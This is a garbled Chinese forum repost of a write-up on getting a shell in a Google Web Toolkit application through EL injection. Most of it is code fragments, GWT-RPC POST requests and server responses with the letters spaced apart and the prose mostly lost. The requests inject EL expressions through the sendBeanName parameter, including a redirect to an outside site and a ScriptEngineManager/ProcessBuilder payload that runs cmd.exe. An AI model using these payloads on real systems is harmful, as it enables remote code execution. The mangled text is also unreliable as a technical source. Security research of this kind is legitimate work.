搜索

[26914] 2020-02-17_如何在GoogleWebToolkit环境下Getshell

文档创建者:s7ckTeam
浏览次数:48
最后更新:2025-01-19
2020-02-17_如何在GoogleWebToolkit环境下Getshell G o o g l e   W e b   T o o l k i t G e t s h e l l     M s 0 8 0 6 7   2 0 2 0 - 0 2 - 1 7 G o o g l e   W e b   T o o l k i t G W T J a v a W E B - I N F / w e b . x m l w e b G W T 便 访 c o m . a a a . b b b . c c c . d d d . c l i e n t S e r v i c e I m p l " M i b W i d g e t B e a n N a m e " s e t M i b N o d e s I n f o M I B N o d e M o d e l m i b N o d e M o d e l L i s t 2 M i b N o d e L i s t M I B N o d e M o d e l g e t B e a n B y N a m e < s e r v l e t >         < s e r v l e t - n a m e > s o m e S e r v i c e < / s e r v l e t - n a m e >         < s e r v l e t - c l a s s > c o m . a a a . b b b . c c c . d d d . s e r v e r . S o m e S e r v i c e I m p l < / s e r v l e t - c l a s s > < / s e r v l e t > < s e r v l e t - m a p p i n g >         < s e r v l e t - n a m e > s o m e S e r v i c e < / s e r v l e t - n a m e >         < u r l - p a t t e r n > / s o m e S e r v i c e . g w t s v c < / u r l - p a t t e r n > < / s e r v l e t - m a p p i n g > p u b l i c   a b s t r a c t   i n t e r f a c e   S o m e S e r v i c e     e x t e n d s   R e m o t e S e r v i c e {     p u b l i c   a b s t r a c t   v o i d   s e n d B e a n N a m e ( S t r i n g   p a r a m S t r i n g ) ;         p u b l i c   a b s t r a c t   B o o l e a n   s e t M i b N o d e s I n f o ( L i s t < M I B N o d e M o d e l >   p a r a m L i s t ) ;         p u b l i c   a b s t r a c t   v o i d   c r e a t e M i b N o d e G e t t i n g B e a n ( ) ; } p u b l i c   v o i d   s e n d B e a n N a m e ( S t r i n g   p a r a m S t r i n g )     {         i f   ( p a r a m S t r i n g   = =   n u l l )   {             r e t u r n ;         }         H t t p S e s s i o n   l o c a l H t t p S e s s i o n   =   s u p e r . g e t T h r e a d L o c a l R e q u e s t ( ) . g e t S e s s i o n ( ) ;         i f   ( l o c a l H t t p S e s s i o n   ! =   n u l l )   {             l o c a l H t t p S e s s i o n . s e t A t t r i b u t e ( " M i b W i d g e t B e a n N a m e " ,   p a r a m S t r i n g ) ;         }     }     p u b l i c   B o o l e a n   s e t M i b N o d e s I n f o ( L i s t < M I B N o d e M o d e l >   p a r a m L i s t )     {         L i s t   l o c a l L i s t   =   M o d e l U t i l . m i b N o d e M o d e l L i s t 2 M i b N o d e L i s t ( p a r a m L i s t ) ;         i f   ( l o c a l L i s t   ! =   n u l l )         {             M i b N o d e s S e l e c t   l o c a l M i b N o d e s S e l e c t   =   g e t B e a n B y N a m e ( ) ;     p r i v a t e   M i b N o d e s S e l e c t   g e t B e a n B y N a m e ( )     {         . . .         O b j e c t   l o c a l O b j e c t 1   =   s u p e r . g e t T h r e a d L o c a l R e q u e s t ( ) . g e t S e s s i o n ( ) ;         i f   ( l o c a l O b j e c t 1   ! =   n u l l )         {             l o c a l O b j e c t 2   =   ( S t r i n g ) ( ( H t t p S e s s i o n ) l o c a l O b j e c t 1 ) . g e t A t t r i b u t e ( " M i b W i d g e t B e a n N a m e " ) ;             i f   ( l o c a l O b j e c t 2   ! =   n u l l )             {                 l o c a l O b j e c t 3   =   n u l l ;                 t r y                 {                     l o c a l O b j e c t 3   =   ( M i b N o d e s S e l e c t ) F a c e s U t i l s . g e t V a l u e E x p r e s s i o n O b j e c t ( l o c a l F a c e s C o n t e x t ,   " # { "   +   ( S t r i n g ) l o c a l O b j e c t 2   +   " } " ) ;                 }                 f i n a l l y                 {                     i f   ( ( l o c a l F a c e s C o n t e x t   ! =   n u l l )   & &   ( i   ! =   0 ) )   {                         l o c a l F a c e s C o n t e x t . r e l e a s e ( ) ;                     }
8 使 M i b W i d g e t B e a n N a m e l o c a l O b j e c t 2 l o c a l O b j e c t 2 1 4 J S F ( j a v a ) " + " " + " u r l 1 0 , " 9 + 1 " 使 b u r p s u i t J S F 便 h t t p E L O r a c l e F a c e s C o n t e x t 使 g e t E x t e r n a l C o n t e x t E x t e r n a l C o n t e x t j a v a 3 0 2 , h t t p : / / s r c i n c i t e . i o /   , M i b W i d g e t B e a n N a m e / / o k [ [ ] , 0 , 6 ] G W T s e s s i o n s e t M i b N o d e s I n f o [ s t r o n g n a m e ] . g w t . r p c :   j a v a . u t i l . A r r a y L i s t / 3 8 2 1 9 7 6 8 2                 }                 r e t u r n   ( M i b N o d e s S e l e c t ) l o c a l O b j e c t 3 ;             }         }         r e t u r n   n u l l ;     } < h : o u t p u t T e x t   v a l u e = " $ { b e a n E L . E L A s S t r i n g ( r e q u e s t . g e t P a r a m e t e r ( ' e x p r e s s i o n ' ) ) } "   / > h t t p : / / [ t a r g e t ] / s o m e _ e n d p o i n t / v u l n . j s f ? e x p r e s s i o n = 9 % 3 b 1 1 .   s e t R e s p o n s e C h a r a c t e r E n c o d i n g 2 .   r e d i r e c t f a c e s C o n t e x t . g e t E x t e r n a l C o n t e x t ( ) . r e d i r e c t ( " h t t p : / / s r c i n c i t e . i o / " ) ; P O S T   / s o m e S e r v i c e . g w t s v c   H T T P / 1 . 1 H o s t :   [ t a r g e t ] A c c e p t :   * / * X - G W T - M o d u l e - B a s e :   X - G W T - P e r m u t a t i o n :   C o o k i e :   J S E S S I O N I D = [ c o o k i e ] C o n t e n t - T y p e :   t e x t / x - g w t - r p c ;   c h a r s e t = U T F - 8 C o n t e n t - L e n g t h :   1 9 5 6 | 0 | 6 | | 4 5 D 7 8 5 0 B 2 B 5 D B 9 1 7 E 4 D 1 8 4 D 5 2 3 2 9 B 5 D 9 | c o m . a a a . b b b . c c c . d d d . c l i e n t . S o m e S e r v i c e | s e n d B e a n N a m e | j a v a . l a n g . S t r i n g | f a c e s C o n t e x t . g e t E x t e r n a l C o n t e x t ( ) . r e d i r e c t ( " h t t p : / / s r c i n c i t e . i o / " ) | 1 | 2 | 3 | 4 | 1 | 5 | 6 | P O S T   / s o m e S e r v i c e . g w t s v c   H T T P / 1 . 1 H o s t :   [ t a r g e t ] A c c e p t :   * / * X - G W T - M o d u l e - B a s e :   X - G W T - P e r m u t a t i o n :   C o o k i e :   J S E S S I O N I D = [ c o o k i e ] C o n t e n t - T y p e :   t e x t / x - g w t - r p c ;   c h a r s e t = U T F - 8 C o n t e n t - L e n g t h :   1 7 1 6 | 0 | 6 | | 4 5 D 7 8 5 0 B 2 B 5 D B 9 1 7 E 4 D 1 8 4 D 5 2 3 2 9 B 5 D 9 | c o m . a a a . b b b . c c c . d d d . c l i e n t . S o m e S e r v i c e | s e t M i b N o d e s I n f o | j a v a . u t i l . L i s t | j a v a . u t i l . A r r a y L i s t / 3 8 2 1 9 7 6 8 2 9 | 1 | 2 | 3 | 4 | 1 | 5 | 6 | 0 | H T T P / 1 . 1   3 0 2   F o u n d S e r v e r :   A p a c h e - C o y o t e / 1 . 1 S e t - C o o k i e :   J S E S S I O N I D = [ c o o k i e ] ;   P a t h = / ;   S e c u r e ;   H t t p O n l y S e t - C o o k i e :   o a m . F l a s h . R E N D E R M A P . T O K E N = - g 9 l c 3 0 a 8 l ;   P a t h = / ;   S e c u r e P r a g m a :   n o - c a c h e C a c h e - C o n t r o l :   n o - c a c h e E x p i r e s :   T h u ,   0 1   J a n   1 9 7 0   0 0 : 0 0 : 0 0   G M T P r a g m a :   n o - c a c h e L o c a t i o n :   h t t p : / / s r c i n c i t e . i o / C o n t e n t - T y p e :   t e x t / h t m l ; c h a r s e t = U T F - 8 C o n t e n t - L e n g t h :   4 5 D a t e :   W e d ,   0 3   M a y   2 0 1 7   1 8 : 5 8 : 3 6   G M T C o n n e c t i o n :   c l o s e / / O K [ 0 , 1 , [ " j a v a . l a n g . B o o l e a n / 4 7 6 4 4 1 7 3 7 " ] , 0 , 6 ]
s h e l l h t t p : / / b l o g . m i n d e d s e c u r i t y . c o m / 2 0 1 5 / 1 1 / r e l i a b l e - o s - s h e l l - w i t h - e l - e x p r e s s i o n . h t m l 使 S c r i p t E n g i n e M a n a g e r j a v a 使 M i b W i d g e t B e a n N a m e 使 s e t M i b N o d e s I n f o b u r p   s u i t e s e e s i o n   h t t p : / / s r c i n c i t e . i o / b l o g / 2 0 1 7 / 0 5 / 2 2 / f r o m - s e r i a l i z e d - t o - s h e l l - a u d i t i n g - g o o g l e - w e b - t o o l k i t - w i t h - e l - i n j e c t i o n . h t m l W E B M s 0 8 0 6 7 W e b P y t h o n J A V A C T F A P T w w w . m s 0 8 0 6 7 . c o m " " . g e t C l a s s ( ) . f o r N a m e ( " j a v a x . s c r i p t . S c r i p t E n g i n e M a n a g e r " ) . n e w I n s t a n c e ( ) . g e t E n g i n e B y N a m e ( " J a v a S c r i p t " ) . e v a l ( " v a r   p r o c = n e w   j a v a . l a n g . P r o c e s s B u i l d e r [ " ( j a v a . l a n g . S t r i n g [ ] ) " ] ( [ " c m d . e x e " , " / c " , " c a l c . e x e " ] ) . s t a r t ( ) ; " ) P O S T   / s o m e S e r v i c e . g w t s v c   H T T P / 1 . 1 H o s t :   [ t a r g e t ] A c c e p t :   * / * X - G W T - M o d u l e - B a s e :   X - G W T - P e r m u t a t i o n :   C o o k i e :   J S E S S I O N I D = [ c o o k i e ] C o n t e n t - T y p e :   t e x t / x - g w t - r p c ;   c h a r s e t = U T F - 8 C o n t e n t - L e n g t h :   3 6 6 6 | 0 | 6 | | 4 5 D 7 8 5 0 B 2 B 5 D B 9 1 7 E 4 D 1 8 4 D 5 2 3 2 9 B 5 D 9 | c o m . a a a . b b b . c c c . d d d . c l i e n t . S o m e S e r v i c e | s e n d B e a n N a m e | j a v a . l a n g . S t r i n g | " " . g e t C l a s s ( ) . f o r N a m e ( " j a v a x . s c r i p t . S c r i p t E n g i n e M a n a g e r " ) . n e w I n s t a n c e ( ) . g e t E n g i n e B y N a m e ( " J a v a S c r i p t " ) . e v a l ( " v a r   p r o c = n e w   j a v a . l a n g . P r o c e s s B u i l d e r [ " ( j a v a . l a n g . S t r i n g [ ] ) " ] ( [ " c m d . e x e " , " / c " , " c a l c . e x e " ] ) . s t a r t ( ) ; " ) | 1 | 2 | 3 | 4 | 1 | 5 | 6 | P O S T   / s o m e S e r v i c e . g w t s v c   H T T P / 1 . 1 H o s t :   [ t a r g e t ] A c c e p t :   * / * X - G W T - M o d u l e - B a s e :   X - G W T - P e r m u t a t i o n :   C o o k i e :   J S E S S I O N I D = [ c o o k i e ] C o n t e n t - T y p e :   t e x t / x - g w t - r p c ;   c h a r s e t = U T F - 8 C o n t e n t - L e n g t h :   1 7 1 6 | 0 | 6 | | 4 5 D 7 8 5 0 B 2 B 5 D B 9 1 7 E 4 D 1 8 4 D 5 2 3 2 9 B 5 D 9 | c o m . a a a . b b b . c c c . d d d . c l i e n t . S o m e S e r v i c e | s e t M i b N o d e s I n f o | j a v a . u t i l . L i s t | j a v a . u t i l . A r r a y L i s t / 3 8 2 1 9 7 6 8 2 9 | 1 | 2 | 3 | 4 | 1 | 5 | 6 | 0 |
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理